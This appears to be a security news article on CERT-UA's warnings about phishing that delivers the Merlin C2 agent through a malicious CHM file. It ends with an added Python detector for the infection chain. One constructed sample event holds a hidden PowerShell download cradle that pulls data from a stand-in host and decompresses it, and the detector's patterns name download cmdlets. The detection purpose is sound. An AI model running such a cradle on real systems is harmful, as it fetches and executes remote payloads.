Ukraine's Cyber Defense Issues Warnings About 'Merlin' Attacks
Git Threat Actor Tools Exposed

Ray Tierney generated this image using Midjourney.
Cobalt Strike, released in 2012, exploded in popularity with threat actors as an attack tool for dropping ransomware on compromised networks, using "beacons" that allow pivoting and lateral movement to high-value systems. The widespread use of Endpoint Detection and Response (EDR) and antivirus solutions has forced attackers to change tactics.
Sliver is an open-source, cross-platform adversary emulation/red team framework developed by researchers at the cybersecurity company Bishop Fox. Microsoft noted in 2022 that hackers ranging from state-sponsored groups to ransomware criminals were using the Go-based security testing tool in their attack campaigns.
Ukraine's CERT-UA recently released reports warning of attacks targeting state organizations using 'Merlin', another cross-platform post-exploitation HTTP command-and-control agent written in Go (Golang).
This Merlin Git repository is a port of the Merlin agent to run on the Mythic framework. This implementation uses Mythic's Default HTTP Command and Control profile. “Merlin” is available for free via GitHub for security professionals to use in red team exercises. It allows red teamers (and attackers) to obtain a foothold on a compromised network.
Merlin is a Go-based cross-platform post-exploitation toolkit with support for HTTP/1.1 over TLS and HTTP/3 (HTTP/2 over QUIC) for C2 communication.
CERT-UA reports that it detected Merlin in attacks that began with a phishing email impersonating the agency (sender address: [email protected]) and purporting to provide recipients with instructions on how to harden their MS Office suite. The emails carry a CHM file attachment that, if opened, executes JavaScript code, which in turn runs a PowerShell script that fetches, decrypts, and decompresses a GZIP archive containing the executable "ctlhost.exe".
CHM files in Windows usually contain help documentation compiled and saved in a compressed HTML format, which may include text, images, and hyperlinks. A user can open a CHM file by double-clicking it, and it is displayed by the Microsoft HTML Help executable.
However, in the case of the malicious CHM file, once the executable runs the computer is infected with "MerlinAgent" and the attackers gain full access to the machine and its data, and with that a foothold from which to move laterally in the network.
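As an added example (not from the article or CERT-UA), the following Python checks constructed Sysmon-style process-creation records for the stages of the infection chain described above: the help viewer spawning a script host, a PowerShell command line that both downloads and GZIP-decompresses, and execution of the named "ctlhost.exe". It assumes hh.exe is the process that opens CHM files on the host and that the field names match Sysmon's Event ID 1.

```python
import re

# Constructed Sysmon-style (Event ID 1) process-creation records; not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ("powershell -nop -w hidden -c \"$b=(New-Object Net.WebClient)"
                     ".DownloadData('http://c2.example.invalid/p');"
                     "$z=New-Object IO.Compression.GZipStream($ms,'Decompress')\"")},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\user\AppData\Local\Temp\ctlhost.exe",
     "CommandLine": r"C:\Users\user\AppData\Local\Temp\ctlhost.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

# Assumption: hh.exe is the Microsoft HTML Help viewer that renders .chm files on the host.
CHM_VIEWER = "hh.exe"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
FETCH_RE = re.compile(r"DownloadData|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod", re.I)
GUNZIP_RE = re.compile(r"GZipStream|Decompress", re.I)
PAYLOAD_NAME = "ctlhost.exe"  # executable named in the CERT-UA report

def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyze_event(ev):
    """Return the list of rule names this single event trips (empty if nothing matched)."""
    hits = []
    parent, image, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev.get("CommandLine", "")
    # Stage 1: the help viewer launching a script interpreter (CHM -> JavaScript -> PowerShell)
    if parent == CHM_VIEWER and image in SCRIPT_HOSTS:
        hits.append("chm_viewer_spawned_script_host")
    # Stage 2: PowerShell that both downloads and GZIP-decompresses in one command line
    if image in {"powershell.exe", "pwsh.exe"} and FETCH_RE.search(cmd) and GUNZIP_RE.search(cmd):
        hits.append("powershell_fetch_and_gunzip")
    # Stage 3: the dropped executable name from the report
    if image == PAYLOAD_NAME:
        hits.append("ctlhost_exe_executed")
    return hits

def scan(events):
    """Map event index -> rule hits for every event that tripped at least one rule."""
    results = {}
    for i, ev in enumerate(events):
        hits = analyze_event(ev)
        if hits:
            results[i] = hits
    return results
```

Only the two chain events are flagged; the notepad record produces no hits.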